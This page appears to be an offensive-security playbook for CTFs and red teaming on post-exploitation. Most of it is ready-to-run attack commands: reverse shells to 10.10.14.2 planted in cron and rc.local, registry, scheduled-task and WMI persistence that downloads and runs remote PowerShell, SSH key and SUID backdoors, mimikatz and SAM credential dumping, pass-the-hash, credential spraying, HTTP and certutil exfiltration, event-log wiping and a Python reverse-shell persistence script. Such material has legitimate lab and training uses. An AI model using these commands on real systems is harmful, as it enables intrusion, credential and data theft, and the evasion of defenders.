Edit

Persistence & Lateral Movement

Post-Exploitation: Persistence & Lateral Movement — The Operator’s Playbook

Once you’ve escalated to root or SYSTEM, the game shifts from “getting in” to staying in, expanding access, and owning the environment. Post-exploitation is where reconnaissance becomes control — persistence, data theft, privilege expansion, and stealth are your weapons.

This section focuses on real-world operator methodology for maintaining and extending access during CTFs, red team operations, and advanced labs.

I. 🧩 Core Concepts

Concept
Description

Persistence

Methods to maintain access after reboot or logout.

Lateral Movement

Expanding from one system/user to another.

Privilege Retention

Ensuring continuous elevated access.

Data Exfiltration

Extracting sensitive information (flags, creds, loot).

Covering Tracks

Evading detection and cleaning artifacts.

II. 🔒 Persistence Techniques

Persistence is about surviving resets and reboots — staying invisible yet present.

🧠 1. Linux Persistence

🔹 Add a Cron Job

echo "@reboot bash -i >& /dev/tcp/10.10.14.2/4444 0>&1" >> /etc/crontab

🔹 Modify rc.local

echo "bash -i >& /dev/tcp/10.10.14.2/4444 0>&1 &" >> /etc/rc.local
chmod +x /etc/rc.local

🔹 SSH Key Injection

mkdir -p ~/.ssh
echo "your_public_key_here" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

🔹 Backdoor with SUID Shell

cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash

Then later:

/tmp/rootbash -p

🧩 2. Windows Persistence

🔹 Registry Autorun

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\payload.exe" /f

🔹 Scheduled Task

schtasks /create /sc onlogon /tn "Backdoor" /tr "powershell.exe -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.2/p.ps1')"

🔹 Service Creation

sc create Backdoor binpath= "C:\rev.exe" start= auto
net start Backdoor

🔹 WMI Event Subscription (Stealth)

wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="filt",EventNamespace="root\cimv2",QueryLanguage="WQL",Query="SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_Process'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="cons",CommandLineTemplate="powershell.exe -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.2/p.ps1')"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name='filt'",Consumer="CommandLineEventConsumer.Name='cons'"

III. 🧠 Credential Extraction & Token Abuse

Post-exploitation means turning secrets into new access.

🧩 Linux

cat /etc/shadow
grep -r "password" /home 2>/dev/null
strings /var/log/auth.log

Dump SSH keys:

find /home -name "id_rsa" 2>/dev/null

🧩 Windows

Dump credentials from memory (with SYSTEM):

mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

Dump SAM/SECURITY/NTDS:

reg save HKLM\SAM sam
reg save HKLM\SYSTEM system

Use secretsdump.py:

secretsdump.py -sam sam -system system LOCAL

Token impersonation:

PrintSpoofer64.exe -i -c cmd.exe

IV. 🚀 Lateral Movement Techniques

Once persistence is stable, expand laterally. Goal: move to other systems or accounts, harvesting domain-wide access.

🧩 1. Credential Reuse

Use dumped hashes or passwords to connect to other systems.

ssh [email protected]
evil-winrm -i 10.10.10.11 -u user -p pass

🧩 2. Pass-the-Hash (Windows)

psexec.py DOMAIN/[email protected] -hashes <LM:NT>

🧩 3. Pass-the-Ticket (Kerberos)

Dump tickets:

mimikatz.exe
sekurlsa::tickets

Use:

kerberos::ptt <ticket.kirbi>

🧩 4. SSH Key Propagation (Linux)

for host in $(cat hosts.txt); do
    ssh-copy-id user@$host
done

🧩 5. SMB/WinRM Propagation (Windows)

crackmapexec smb 10.10.10.0/24 -u admin -p password
crackmapexec winrm 10.10.10.0/24 -u admin -p password --exec "whoami"

V. 🧰 Data Exfiltration

Your end goal in CTFs: get flags, credentials, or loot.

🧠 Simple Exfil

tar czf loot.tar.gz /root/.ssh /var/www/html/*.php
python3 -m http.server 8080

Download:

wget http://<attacker_ip>:8080/loot.tar.gz

💣 Stealthy Windows Exfil

Compress-Archive -Path C:\Users\Admin\Documents -DestinationPath C:\temp.zip
certutil -urlcache -split -f "http://10.10.14.2/upload.zip" C:\temp.zip

VI. 🧹 Covering Tracks

Once you have persistence and loot, clean your footprints.

🧩 Linux

history -c
rm -rf /tmp/*
find / -name ".bash_history" -exec rm {} \; 2>/dev/null

🧩 Windows

del /F /Q C:\Windows\Temp\*
wevtutil cl Security
wevtutil cl System
Remove-Item -Path $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

VII. 🧠 Real-World Operator Workflow

# Step 1: PrivEsc achieved
whoami

# Step 2: Persistence
(cron / reg add / schtasks)

# Step 3: Cred extraction
mimikatz / /etc/shadow

# Step 4: Lateral movement
crackmapexec smb 10.10.10.0/24 -u user -p password

# Step 5: Exfiltration
tar czf /tmp/loot.tar.gz /home/*flag*
python3 -m http.server 8000

VIII. 🧩 Tools & Frameworks

Tool
Purpose

Metasploit (post modules)

Automated post-exploitation

Empire

PowerShell-based C2 & persistence

CrackMapExec

SMB/WinRM movement & credential spraying

Mimikatz / LaZagne

Credential dumping

SharpHound (BloodHound)

Lateral movement graphing

LinPEAS / WinPEAS

Enumeration for persistence

Chisel / SSH / Socat

Pivoting & tunneling

IX. 🧠 Pro Tips & Red Team Tricks

Persistence Safety

  • Always duplicate your access method (cron + SSH key, or schtasks + service).

  • Rotate ports and encode payloads to bypass AV.

Lateral Movement Logic

  • Prioritize systems with administrative sessions (net sessions).

  • Enumerate users and trust relationships:

    net view /domain
net group "Domain Admins" /domain

Data Discipline

  • Store loot in organized folders:

    /loot/
├── creds.txt
├── shadow_dumps/
├── screenshots/
└── flags/

  • Compress before exfil to reduce signatures.

Operational Security

  • Always clean shell history before disengagement.

  • Randomize filenames, ports, and service names.

  • Encrypt communication channels when possible.

X. ⚔️ Bonus: Persistence + C2 Template (Linux)

#!/bin/bash
# Minimal C2 Persistence
if ! pgrep -f revshell.py > /dev/null; then
    nohup python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("10.10.14.2",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")' &
fi
(crontab -l; echo "@reboot /tmp/revshell.py") | crontab -
PreviousTunneling And PivotingNextPrivilege Escalation

Last updated

Was this helpful?